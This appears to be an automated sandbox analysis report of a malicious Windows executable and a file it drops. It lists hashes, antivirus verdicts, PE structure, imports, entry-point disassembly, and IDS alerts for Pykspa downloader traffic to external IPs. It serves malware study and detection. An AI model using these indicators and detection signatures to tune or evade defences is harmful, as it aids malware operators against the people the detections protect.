                                                                                                                                                                                                                                                    SHA1:F6665BC49B88D92CF38889EDB3005FEDD0E8E2FF
                                                                                                                                                                                                                                                    SHA-256:ECFD69B6CFAFA48F7B5BCB6BCF0BCCF3C91E7CC7996DDADDDA5709ADD7F5A539
                                                                                                                                                                                                                                                    SHA-512:9380FF4823E65116C1EEE36F8CE43CCD9D0B7B371F1DA0C410237EC0DC3869646D78D820B712931982D1202F133A72C2671FE06E4EF17527A7482F65624E63AC
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...........A............@..........................P..............................................x...<........w..............................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc....w..........................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):479232
                                                                                                                                                                                                                                                    Entropy (8bit):7.862740136854356
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:qIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUpvP:qIXsgtvm1De5YlOx6lzBH46UpvP
                                                                                                                                                                                                                                                    MD5:94974F1E2AB7872225F985D76E99EDB0
                                                                                                                                                                                                                                                    SHA1:F6665BC49B88D92CF38889EDB3005FEDD0E8E2FF
                                                                                                                                                                                                                                                    SHA-256:ECFD69B6CFAFA48F7B5BCB6BCF0BCCF3C91E7CC7996DDADDDA5709ADD7F5A539
                                                                                                                                                                                                                                                    SHA-512:9380FF4823E65116C1EEE36F8CE43CCD9D0B7B371F1DA0C410237EC0DC3869646D78D820B712931982D1202F133A72C2671FE06E4EF17527A7482F65624E63AC
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L....@ZI.................p...........A............@..........................P..............................................x...<........w..............................................................H............................................text....m.......p.................. ..`.rdata..*........ ..................@..@.data...8).......0..................@....rsrc....w..........................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):4.612147157482853
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:HqvlYZC7Gf.exe
                                                                                                                                                                                                                                                    File size:1'040'384 bytes
                                                                                                                                                                                                                                                    MD5:2cdb760530ec92b79ee2bf80371cac90
                                                                                                                                                                                                                                                    SHA1:70ef5a50636afaaa91ff0cb0df77f7e2fe14b6b2
                                                                                                                                                                                                                                                    SHA256:e0e9067bd90b97af4c6bcdfee36fad24b4cf382be9314d58532acc0db0c7b37b
                                                                                                                                                                                                                                                    SHA512:e37804ea5ccfd67ac3960af429c72929286a2fa730953f89fd64e113210870395524fa3873f45f31daa579f22e06768ba7aa947d58daed3c2b8907b754b15342
                                                                                                                                                                                                                                                    SSDEEP:6144:wIXsL0tvrSVz1DnemeYbpsnEf78AoXh6KkiD0OofzA+/VygHUmDa1is0f:wIXsgtvm1De5YlOx6lzBH46Umu1q
                                                                                                                                                                                                                                                    TLSH:D625E0147912DCB9DE2A6AB8D04D88FA465F5C27D5C9012F23F07FC9B2751D0888EEE9
                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c.lQ..?Q..?Q..?B..?P..?T..?x..?T..?]..?.!.?S..?...?R..?Q..?...?T..?R..?...?P..?T..?P..?RichQ..?........................PE..L..
                                                                                                                                                                                                                                                    Icon Hash:b38bc1a1e7b25923
                                                                                                                                                                                                                                                    Entrypoint:0x4041d2
                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                                                                                                    Time Stamp:0x495A40E6 [Tue Dec 30 15:40:22 2008 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                    Import Hash:773d7937b438e0107267de7afcefad28
                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    push 00000060h
                                                                                                                                                                                                                                                    push 00408138h
                                                                                                                                                                                                                                                    call 00007FC524BEC493h
                                                                                                                                                                                                                                                    mov edi, 00000094h
                                                                                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                                                                                    call 00007FC524BEC5EBh
                                                                                                                                                                                                                                                    mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                                                                    mov esi, esp
                                                                                                                                                                                                                                                    mov dword ptr [esi], edi
                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                    call dword ptr [00408064h]
                                                                                                                                                                                                                                                    mov ecx, dword ptr [esi+10h]
                                                                                                                                                                                                                                                    mov dword ptr [0046C3BCh], ecx
                                                                                                                                                                                                                                                    mov eax, dword ptr [esi+04h]
                                                                                                                                                                                                                                                    mov dword ptr [0046C3C8h], eax
                                                                                                                                                                                                                                                    mov edx, dword ptr [esi+08h]
                                                                                                                                                                                                                                                    mov dword ptr [0046C3CCh], edx
                                                                                                                                                                                                                                                    mov esi, dword ptr [esi+0Ch]
                                                                                                                                                                                                                                                    and esi, 00007FFFh
                                                                                                                                                                                                                                                    mov dword ptr [0046C3C0h], esi
                                                                                                                                                                                                                                                    cmp ecx, 02h
                                                                                                                                                                                                                                                    je 00007FC524BEB71Eh
                                                                                                                                                                                                                                                    or esi, 00008000h
                                                                                                                                                                                                                                                    mov dword ptr [0046C3C0h], esi
                                                                                                                                                                                                                                                    shl eax, 08h
                                                                                                                                                                                                                                                    add eax, edx
                                                                                                                                                                                                                                                    mov dword ptr [0046C3C4h], eax
                                                                                                                                                                                                                                                    xor esi, esi
                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                    mov edi, dword ptr [00408058h]
                                                                                                                                                                                                                                                    call edi
                                                                                                                                                                                                                                                    cmp word ptr [eax], 5A4Dh
                                                                                                                                                                                                                                                    jne 00007FC524BEB731h
                                                                                                                                                                                                                                                    mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                                                                                                    add ecx, eax
                                                                                                                                                                                                                                                    cmp dword ptr [ecx], 00004550h
                                                                                                                                                                                                                                                    jne 00007FC524BEB724h
                                                                                                                                                                                                                                                    movzx eax, word ptr [ecx+18h]
                                                                                                                                                                                                                                                    cmp eax, 0000010Bh
                                                                                                                                                                                                                                                    je 00007FC524BEB731h
                                                                                                                                                                                                                                                    cmp eax, 0000020Bh
                                                                                                                                                                                                                                                    je 00007FC524BEB717h
                                                                                                                                                                                                                                                    mov dword ptr [ebp-1Ch], esi
                                                                                                                                                                                                                                                    jmp 00007FC524BEB739h
                                                                                                                                                                                                                                                    cmp dword ptr [ecx+00000084h], 0Eh
                                                                                                                                                                                                                                                    jbe 00007FC524BEB704h
                                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                                    cmp dword ptr [ecx+000000F8h], esi
                                                                                                                                                                                                                                                    jmp 00007FC524BEB720h
                                                                                                                                                                                                                                                    cmp dword ptr [ecx+74h], 0Eh
                                                                                                                                                                                                                                                    jbe 00007FC524BEB6F4h
                                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                                    cmp dword ptr [ecx+000000E8h], esi
                                                                                                                                                                                                                                                    setne al
                                                                                                                                                                                                                                                    mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                    • [ C ] VS2003 (.NET) build 3077
                                                                                                                                                                                                                                                    • [ASM] VS2003 (.NET) build 3077
                                                                                                                                                                                                                                                    • [C++] VS2003 (.NET) build 3077
                                                                                                                                                                                                                                                    • [RES] VS2003 (.NET) build 3077
                                                                                                                                                                                                                                                    • [LNK] VS2003 (.NET) build 3077
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8d780x3c.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000xc180.rsrc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8d100x48.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x104.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    .text0x10000x6dae0x7000a7bd0ea357371b7b19c0cb2a3a8f2ad0False0.46365792410714285data6.23372473313081IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .rdata0x80000x132a0x20007cc61a3397d1ea04897e6b33a79bf078False0.2130126953125COM executable for DOS3.343352300925096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .data0xa0000x629380x63000f355c62f0530688a40128f0d2b63f21eFalse0.8952760022095959Matlab v4 mat-file (little endian) \310X@, numeric, rows 4222145, columns 07.9899679469399985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .rsrc0x6d0000x908e40x91000df9e20ea9e7b51a85997011de831d4b6False0.04047009698275862data0.8509390790115429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                    RT_ICON0x6d3a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.6317567567567568
                                                                                                                                                                                                                                                    RT_ICON0x6d4c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4819364161849711
                                                                                                                                                                                                                                                    RT_ICON0x6da300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5789007092198581
                                                                                                                                                                                                                                                    RT_ICON0x6de980x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.5940860215053764
                                                                                                                                                                                                                                                    RT_ICON0x6e1800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.5487364620938628
                                                                                                                                                                                                                                                    RT_ICON0x6ea280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.700046904315197
                                                                                                                                                                                                                                                    RT_ICON0x6fad00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.46961620469083154
                                                                                                                                                                                                                                                    RT_ICON0x709780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.6362033195020746
                                                                                                                                                                                                                                                    RT_ICON0x72f200x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.3042682926829268
                                                                                                                                                                                                                                                    RT_ICON0x735880x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.4032258064516129
                                                                                                                                                                                                                                                    RT_ICON0x738700x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.5574324324324325
                                                                                                                                                                                                                                                    RT_ICON0x739980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.39738805970149255
                                                                                                                                                                                                                                                    RT_ICON0x748400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.44945848375451264
                                                                                                                                                                                                                                                    RT_ICON0x750e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4985549132947977
                                                                                                                                                                                                                                                    RT_ICON0x756500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.34066390041493777
                                                                                                                                                                                                                                                    RT_ICON0x77bf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3803939962476548
                                                                                                                                                                                                                                                    RT_ICON0x78ca00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5088652482269503
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x791080x76dataEnglishUnited States0.652542372881356
                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                    KERNEL32.dllCloseHandle, FreeLibrary, GetProcAddress, LoadLibraryA, GetTempPathA, GetFileAttributesA, GetComputerNameA, Sleep, GetCurrentDirectoryA, GetModuleFileNameA, SetErrorMode, WriteFile, GetTickCount, CreateFileA, Process32Next, Process32First, CreateToolhelp32Snapshot, GetLastError, CreateMutexA, OpenMutexA, VirtualProtect, GetLocaleInfoA, GetModuleHandleA, GetStartupInfoA, GetCommandLineA, GetVersionExA, ExitProcess, TerminateProcess, GetCurrentProcess, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, HeapDestroy, HeapCreate, VirtualFree, HeapFree, GetACP, GetOEMCP, GetCPInfo, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, InterlockedExchange, VirtualQuery, HeapSize, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetSystemInfo
                                                                                                                                                                                                                                                    SHELL32.dllShellExecuteA
                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                    2024-10-15T15:39:04.516532+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049799104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:04.516532+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049799104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:04.516532+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049799104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:05.944586+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049800172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:05.944586+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049800172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:05.944586+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049800172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:09.546757+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049803104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:09.546757+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049803104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:09.546757+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049803104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:10.856018+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049804104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:10.856018+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049804104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:10.856018+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049804104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:12.302442+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049805104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:12.302442+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049805104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:12.302442+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049805104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:17.912787+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049810104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:17.912787+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049810104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:17.912787+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049810104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:21.359177+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049813104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:21.359177+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049813104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:21.359177+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049813104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:22.660608+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049814104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:22.660608+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049814104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:22.660608+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049814104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:24.111158+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.304981534.111.176.15680TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:24.111158+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.304981534.111.176.15680TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:24.718814+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.304981931.13.67.3580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:24.718814+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.304981931.13.67.3580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:24.820055+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.304981835.164.78.20080TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:24.820055+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.304981835.164.78.20080TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:25.001188+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049820104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:25.001188+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049820104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:25.001188+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049820104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:25.100253+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.11.3049818TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:25.100253+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.11.3049818TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:26.307764+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049822104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:26.307764+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049822104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:26.307764+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049822104.27.206.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:26.339356+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.304982185.214.228.14080TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:26.339356+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.304982185.214.228.14080TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:29.201995+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049825208.100.26.24580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:29.201995+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049825208.100.26.24580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:29.880511+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049827104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:29.880511+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049827104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:29.880511+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049827104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:33.208180+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049831104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:33.208180+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049831104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:33.208180+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049831104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:34.503486+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049833172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:34.503486+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049833172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:34.503486+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049833172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:35.819415+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049834104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:35.819415+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049834104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:35.819415+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049834104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:38.405222+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049838104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:38.405222+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049838104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:38.405222+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049838104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:40.725141+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049842172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:40.725141+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049842172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:40.725141+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049842172.67.155.17580TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:42.019421+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049843104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:42.019421+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049843104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:42.019421+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049843104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:43.319151+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049844104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:43.319151+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049844104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:43.319151+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049844104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:45.762930+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049848104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:45.762930+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049848104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:45.762930+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049848104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:47.050668+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049850104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:47.050668+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049850104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:47.050668+02002018773ET MALWARE Win32/Pykspa.C Public IP Check1192.168.11.3049850104.27.207.9280TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:48.354841+02002803306ETPRO MALWARE Common Downloader Header Pattern Specific Mozilla 5 HAUC3192.168.11.3049851104.19.223.7980TCP
                                                                                                                                                                                                                                                    2024-10-15T15:39:48.354841+02002803307ETPRO MALWARE Common Downloader Header Pattern General HAUC3192.168.11.3049851104.19.223.7980TCP
